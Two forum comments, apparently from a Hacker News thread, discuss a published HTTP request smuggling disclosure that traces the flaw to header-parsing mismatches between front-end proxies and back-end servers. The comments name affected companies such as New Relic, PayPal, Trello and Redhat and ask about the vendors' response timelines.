This is incredible and it looks like it could affect massive numbers of sites - unfortunately the article doesn't summarise the problem very well.<p>The vector is subtle differences in HTTP header parsing between your front end (reverse proxy, load balancer etc) and your back end (web server).<p>"New Relic deployed a hotfix and diagnosed the root cause as a weakness in an F5 gateway. As far as I'm aware there's no patch available, meaning this is still a zeroday at the time of writing.".<p>Edit: other major companies he revealed were affected were: PayPal, Trello, Redhat.
I've been waiting to hear more about this since the abstract was published.<p>What was the timelines involved here? PayPal, Trello, and others were contacted over the course of this investigation. It would be nice to know what their response times were to such a serious vulnerability.